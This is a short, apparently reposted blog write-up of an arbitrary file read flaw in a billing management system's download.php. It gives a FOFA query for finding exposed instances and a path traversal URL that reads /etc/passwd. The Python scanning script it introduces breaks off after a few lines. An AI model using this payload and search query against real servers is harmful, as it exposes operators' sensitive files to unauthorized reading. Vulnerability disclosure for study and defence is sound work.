Arbitrary file reading vulnerability in a billing management system


statement

Please do not use the relevant technologies in this article to engage in illegal testing. Any direct or indirect consequences and losses caused by the dissemination and use of the information or tools provided in this article are the responsibility of the user himself. All adverse consequences and The author of the article is irrelevant. This article is for educational purposes only.

1. Vulnerability description

There is an arbitrary file reading vulnerability in the Blue Ocean Excellent Accounting Management System download.phpfile. An attacker can read sensitive files on the server by traversing the .../ directory.

2. Recurrence of vulnerabilities

Vulnerability keyword search
FOFA: title =="蓝海卓越计费管理系统"
Insert image description here
Vulnerability location: download.php?file=../../../../../etc/passwd
Insert image description here
Script detection

# -*- coding: utf-8 -*-

import argparse
import sys
import requests
from multiprocessing.dummy import Pool  # 表示的是多线程

reque

Guess you like

Origin blog.csdn.net/weixin_46944519/article/details/132846113